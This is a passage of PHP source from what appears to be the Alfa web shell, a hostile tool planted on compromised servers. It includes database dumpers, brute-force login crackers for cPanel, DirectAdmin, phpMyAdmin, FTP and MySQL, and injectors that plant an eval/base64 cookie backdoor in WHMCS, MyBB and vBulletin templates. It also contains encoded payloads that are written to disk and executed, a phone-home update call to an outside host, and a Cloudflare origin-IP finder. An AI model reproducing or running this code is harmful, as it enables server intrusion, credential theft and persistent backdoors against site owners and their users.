 array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50')

);

create_table($table);

echo "
";

$db = false;

if(!empty($dbname)){

    $db = @mysqli_connect($host, $username, $password, $dbname);

}

if(count($selected_data) > 0){

    if($db){

        if(!is_dir($dfile)){

            $dfile = $GLOBALS['cwd'];

        }

        $tbls = "";

        $ext = '.txt';

        if($delimiter == 'json'){

            $ext = '.json';

        }

        foreach ($selected_data as $tbl => $cols) {

            $tables_query = mysqli_query($db, "SELECT ".implode(',', $cols)." FROM $tbl");

            $file_name = $dfile.'/'.$dbname.'.'.$tbl.$ext;

            $fp = fopen($file_name, "w");

            $data = array();

            while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){

                if($delimiter == "json"){

                    $col_arr = array();

                    foreach ($row as $key => $value) {

                        if(empty($value)){

                            $value = "[empty]";

                        }

                         $col_arr[$key] = $value;

                    }

                    $data[$tbl][] = $col_arr;

                }else{

                    $data = "";

                    foreach ($row as $key => $value) {

                        if(empty($value)){

                            $value = "[empty]";

                        }

                        $data .= $value . $delimiter;

                    }

                    fwrite($fp, $data ."\n");

                }

            }

            if($delimiter == "json"){

                fwrite($fp, json_encode($data));

            }

            fclose($fp);

            $tbls .= "Done ~~~> ".$file_name."
";

        }

        echo __pre();

        echo "
".$tbls."
";

    }

}

if(!empty($dbname) && count($selected_data) == 0){

//echo __pre();

if($db){

    echo("
[ Select your tables and columns for dumping data ]
");

    echo("
Output Type: 
 Delimiter: 
");

    $data = array();

    $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");

    while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){

        $data[$row["table_name"]] = array();

        $table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row['table_name']."`");

        $table_count = mysqli_fetch_row($table_count_q);

        $data[$row["table_name"]]["data_count"] = $table_count[0];

        $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '".$row['table_name']."'");

        while($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){

            $data[$row["table_name"]]["cols"][] = $row2["column_name"];

        }

    }

    mysqli_close($db);



    echo '
    ';
    
    foreach($data as $tbl => $cols){
    
        echo '
  • '.$tbl.' ('.$cols["data_count"].')
      ';
      
        foreach($cols["cols"] as $col){
      
            echo '
    • ' . $col . '
      • ';
      
        }
      
        echo '
    • ';
    
    }
    
    echo '
';

}else{

echo('
mysqli_connect : Error!
');

}

}

echo('
');

alfafooter();

}

function alfaDumper(){

alfahead();

echo('
');

AlfaNum(8,9,10);

echo "

| Mysql Database Dumper |


".getConfigHtml('all')."
";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')

);

create_table($table);

echo "
";

$username = ($_POST['alfa3']);

$password = ($_POST['alfa4']);

$dbname = ($_POST['alfa5']);

$dfile = ($_POST['alfa6']);

$host = ($_POST['alfa7']);

if(!empty($dbname)){

echo __pre();

$msg = "
Check this :  ".$dfile."
";

if(@mysqli_connect($host,$username,$password,$dbname)){

if(strlen(alfaEx("mysqldump"))>0){

alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");

echo($msg);

}else{

__alert("Error...!");

}

}else{

echo('
mysqli_connect : Error!
');

}

}

echo('
');

alfafooter();

}

function Alfa_DirectAdmin_Cracker($info){

if(!$info['mysql'])

$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';

else $url = $info['protocol'].$info['target'].'/phpmyadmin';

$curl = curl_init();

curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);

curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');

curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);

curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);

curl_setopt($curl, CURLOPT_HEADER,0);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_URL,$url);

curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);

if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);

$result = @curl_exec($curl);

$curl_errno = curl_errno($curl);

$curl_error = curl_error($curl);

if ($curl_errno > 0) {echo "Error: $curl_error
";}

elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){

echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';

$info['target'] = $url;

CrackerResualt($info);

}

curl_close($curl);

}

function Alfa_CP_Cracker($info){

$url = $info['protocol'].$info['target'].':'.$info['port'];

$curl = curl_init();

curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);

curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');

curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);

curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);

curl_setopt($curl, CURLOPT_HEADER,0);

curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);

curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));

curl_setopt($curl, CURLOPT_URL, $url);

$result = @curl_exec($curl);

$curl_errno = curl_errno($curl);

$curl_error = curl_error($curl);

if ($curl_errno > 0) {echo "Error: $curl_error
";}

elseif(preg_match('/filemanager/i',$result)){

echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';

$info['target'] = $url;

CrackerResualt($info);

}

curl_close($curl);

}

function Alfa_FTP_Cracker($info){

$url = $info['protocol'].$info['target'];

$curl = curl_init();

curl_setopt($curl, CURLOPT_URL, $url);

curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");

$result = @curl_exec($curl);

$curl_errno = curl_errno($curl);

$curl_error = curl_error($curl);

if ($curl_errno > 0) {echo "Error: $curl_error
";}

elseif(preg_match('/(\d+):(\d+)/i',$result)){

echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';

$info['target'] = $url;

CrackerResualt($info);

}

curl_close($curl);

}

function Alfa_Mysql_Cracker($info){

if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){

CrackerResualt($info);

echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';

}

}

function Alfa_FTPC($info){

if($con=@ftp_connect($info['target'],$info['port'])){

if($con){

$login=@ftp_login($con,$info['username'],$info['password']);

if($login){CrackerResualt($info);}}}

@ftp_close($con);

}

function CrackerResualt($info){

$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;

$c = @fopen($info['fcrack'],'a+');

@fwrite($c, $res);

@fclose($c);

}

function Alfa_Call_Function_Cracker($method,$info){

switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}

}

function alfaCrackers(){

alfahead();

AlfaNum(9,10);

echo '

| Brute Forcer |


Login Page:  Protocol:  Website/ip Address: 

Port: 


Users ListPasswords




  



Save Result Into File 


';

$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);

$port = $_POST['alfa2'];

$usernames= $_POST['alfa3'];

$passwords = $_POST['alfa4'];

$fcrack = $_POST['alfa5'];

$cracking = $_POST['alfa6'];

$protocol = $_POST['alfa7'];

$loginpanel = $_POST['alfa8'];

$p = $loginpanel == 'phpmyadmin' ? $p = true : false;

if($cracking=='start'){

echo __pre();

$exuser = explode("\n",$usernames);

$expw = explode("\n",$passwords);

foreach($exuser as $user){

foreach($expw as $pw){

$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);

Alfa_Call_Function_Cracker($loginpanel,$array);

}

}

echo '
Attack Finished...';

}

echo '
';

alfafooter();

}

function output($string){ echo "

Click Here !


";}

function alfaShellInjectors(){

alfahead();

echo '
';

AlfaNum(11);

echo '
| Cms Shell Injector |
| WHMCS | | MyBB | | vBulletin |
';

$selector = '
Shell Inject Method : 
 
';

if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){

AlfaNum();

echo __pre()."
| WHMCS |
".getConfigHtml('whmcs')."
";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo $selector;

echo "
";
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$path = $_POST['alfa10'];
$method = $_POST['alfa4'];
$index = "{php}".ALFA_UPLOADER.";{/php}";
$newin = str_replace("'","\'",$index);
$newindex = "

Dear $newin,

Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.

To reset your password, please visit the url below:
{\$pw_reset_url}

When you visit the link above, your password will be reset, and the new password will be emailed to you.

{\$signature}

{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
if(filter_var($path,FILTER_VALIDATE_URL)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());
$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
$soleGet = mysqli_fetch_assoc($soleSave);
$tempSave1 = $soleGet['message'];
$tempSave = str_replace("'","\'",$tempSave1);
mysqli_query($conn,"UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die (mysqli_error($conn));
$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
if(function_exists('curl_version') && $method == 'auto'){
$AlfaSole = new AlfaCURL(true);
$saveurl = $AlfaSole->Send($path."/pwreset.php");
$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
__alert("shell injectet...");
$ff= 'http://'.$path."/solevisible.php";
output($ff);}else{
echo "

Please go to Target => ".$path."/pwreset.php
 And Reset Password With Email => solevisible@fbi.gov
And Go To => ".$path."/solevisible.php


";}}else{__alert('Path is not Valid...');}}}

}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){

AlfaNum(1,2,3,5);

echo __pre()."
| MyBB |
".getConfigHtml("mybb")."


";

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')

);

create_table($table);

echo $selector;

echo "
";

if(isset($_POST['alfa6'])) {

$dbu = $_POST['alfa6'];

$dbn = $_POST['alfa7'];

$dbp = $_POST['alfa8'];

$dbh = $_POST['alfa9'];

$prefix = $_POST['alfa10'];

$method = $_POST['alfa4'];

$shellCode = "{\${".ALFA_UPLOADER."}}";

$newinshell = str_replace("'","\'",$shellCode);

if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){

$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$inject = "select template from {$prefix}templates where  title= 'calendar'";

$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));

$GetTemp = mysqli_fetch_assoc($result);

$saveDate = $GetTemp['template'];

$repsave = str_replace($shellCode,"",$saveDate);

$repsave = str_replace("'","\'",$repsave);

$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";

$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));

$geturl = "select value from {$prefix}settings where name= 'bburl'";

$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));

$rowb = mysqli_fetch_assoc($findurl);

$furl = $rowb['value'];

$realurl = parse_url($furl,PHP_URL_HOST);

$realpath = parse_url($furl,PHP_URL_PATH);

$res = false;

$AlfaCurl = new AlfaCURL();

if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){

if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){

@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");

@fputs($fsock, "HOST: $realurl\r\n");

@fputs($fsock, "Connection: close\r\n\r\n");

$check = fgets($fsock);

if(preg_match("/200 OK/i",$check)){

$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";

$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}

@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){

$AlfaCurl->Send($realurl.$realpath."/calendar.php");

$res = true;

}

if($res){

$ff = 'http://'.$realurl.$realpath."/solevisible.php";

output($ff);

}else{

$ff = 'http://'.$realurl.$realpath."/calendar.php";

$fff = 'http://'.$realurl.$realpath."/solevisible.php";

echo "

Please Go To Target => ".$ff."
And Go To => ".$fff."


";

}}}}

if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){

AlfaNum(1,2,7,9,10);

echo __pre().'
| vbulletin |
'.getConfigHtml('vb').'
';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo $selector;

echo '
';

if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){

$method = $_POST['alfa8'];

$faq_name = "faq";

$faq_file = "/faq.php";

$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";

$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_connect_error());

$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";

$recivedata = @mysqli_query($conn,$rec);

$getd = @mysqli_fetch_assoc($recivedata);

$savetoass = $getd['template'];

if(empty($savetoass)){

    $faq_name = "header";

    $faq_file = "/";

    $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";

    $recivedata = @mysqli_query($conn,$rec);

    $getd = @mysqli_fetch_assoc($recivedata);

    $savetoass = $getd['template'];

    $code = ALFA_UPLOADER.";";

}

$code = str_replace("'","\'",$code);

$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='".$faq_name."'";

$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));

$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");

$getval = @mysqli_fetch_assoc($geturl);

$saveval = $getval['value'];

if($faq_name == "header"){

    if(substr($saveval, -5, 5) == "/core"){

        $saveval = substr($saveval, 0, -5);

    }

}

$realurl = parse_url($saveval,PHP_URL_HOST);

$realpath = parse_url($saveval,PHP_URL_PATH);

$res = false;

$AlfaCurl = new AlfaCURL();

if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){

if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){

@fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n");

@fputs($fsock, "HOST: $realurl\r\n");

@fputs($fsock, "Connection: close\r\n\r\n");

$check = fgets($fsock);

if(preg_match("/200 OK/i",$check)){

$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";

$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));

$res = true;

}

@fclose($fsock);

}

}elseif(function_exists('curl_version') && $method == 'auto'){

$AlfaCurl->Send($realurl.$realpath.$faq_file);

$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";

$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));

$res = true;

}

if($res){

$ff = 'http://'.$realurl.$realpath."/solevisible.php";

output($ff);

}else{

$ff = 'http://'.$realurl.$realpath.$faq_file;

$fff = 'http://'.$realurl.$realpath."/solevisible.php";

echo "
First Open This Link => ".$ff."
Second Open This Link => ".$fff."
";}}}

echo '';

alfafooter();

}

function alfacheckfiletype(){

    $path = $_POST['path'];

    $arg = $_POST['arg'];

    if(@is_file($path.'/'.$arg)){

        echo("file");

    }else{

        echo("dir");

    }

}

function alfacheckupdate(){

    if($GLOBALS["DB_NAME"]["cgi_api"]){

        if(!isset($_COOKIE["alfacgiapi_mode"])&&!isset($_COOKIE["alfacgiapi"])){

            _alfa_cgicmd("whoami","perl",true);

            if(strlen(alfaEx("whoami",false,true))>0){

                __alfa_set_cookie("alfa_canruncmd", "true");

            }

        }

    }

    if(function_exists("curl_version")){

        $update = new AlfaCURL();

        $json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);

        $json = @json_decode($json,true);

        $data = array();

        if($json){

            if(!isset($_COOKIE['alfa_checkupdate']) && !empty($json["type"])){

                if($json["type"] == "update"){

                    if(__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']){

                        @setcookie("alfa_checkupdate", "1", time()+86400);

                        $data["content"] = '
'.$json["content"].'
';

                    }

                }

            }

            if(isset($json["ads"]) && !empty($json["ads"])){

                $data["content"] .= $json["ads"];

            }

            if(isset($json["copyright"]) && !empty($json["copyright"])){

                $data["copyright"] = $json["copyright"];

            }

            if(isset($json["solevisible"]) && !empty($json["solevisible"])){

                $data["solevisible"] = $json["solevisible"];

            }

            if(isset($json["code_name"]) && !empty($json["code_name"])){

                $data["code_name"] = $json["code_name"];

                $data["version_number"] = __ALFA_VERSION__;

            }

            if(isset($json["market"]) && !empty($json["market"])){

                $data["market"] = $json["market"];

            }

            echo @json_encode($data);

        }

    }

}

function alfaWriteTocgiapi($name, $source){

    $temp = "";

    $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");

    if(in_array($name, $not_api)){

        $temp = ALFA_TEMPDIR;

        if($temp){

            @chdir($temp);

        }

    }else{

        alfaCreateParentFolder();

        @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);

    }

    @mkdir('alfacgiapi',0755);

    __write_file("alfacgiapi/".$name, __get_resource($source));

    @chmod("alfacgiapi/".$name, 0755);

    return $temp;

}

function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}

function alfaupdateheader(){

    if(!isset($_COOKIE["updateheader_data"])){

        $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";

        $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));

        $tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);

        $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa",false,true,true);

        if(@is_array(@json_decode($data,true))){

            __alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data));

            echo $data;

        }

    }else{

        echo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]);

    }

}

function alfassiShell(){

alfahead();

echo '
';

alfaCreateParentFolder();

@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);

@mkdir('alfa_shtml',0755);

@chdir('alfa_shtml');

alfacgihtaccess('shtml');

$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';

@__write_file('alfa_ssi.shtml',__get_resource($code));

@chmod("alfa_ssi.shtml",0755);

echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');

echo '
';

alfafooter();

}

function alfacloudflare(){

alfahead();

AlfaNum(8,9,10,7,6,5,4,3);

echo "

| Cloud Flare ByPasser |

>'); return false;\" method='post'>


Target:
  
";

if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){

$url = $_POST['alfa1'];

if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){

$url = preg_replace('/^(https?):\/\//', '', $url);

$url = "http://www.".$url;

}

$headers = @get_headers($url, 1);

$server = $headers['Server'];

$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');

if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){

if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{

$url = explode($matches[0], $url);

$url = $url[1];}}

if(is_array($server))$server = $server[0];

echo __pre();

if(preg_match('/cloudflare/i', $server))

echo "\n[+] CloudFlare detected: {$server}\n
";

else

echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";

echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n

";

echo "[+] Searching for more IP addresses.\n\n

";

for($x=0;$x
$site = $subs[$x] . $url;

$ip = is_ipv4(gethostbyname($site));

if($ip == '(Null)')

continue;

echo "Trying {$site}: {$ip}\n
";

}

echo "\n[+] Finished.\n
";

}

echo '
';

alfafooter();

}

function is_ipv4($ip){

return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';

}

function __alert($s){

echo '
'.__pre().$s.'
';

}

function create_table($data){

echo '';

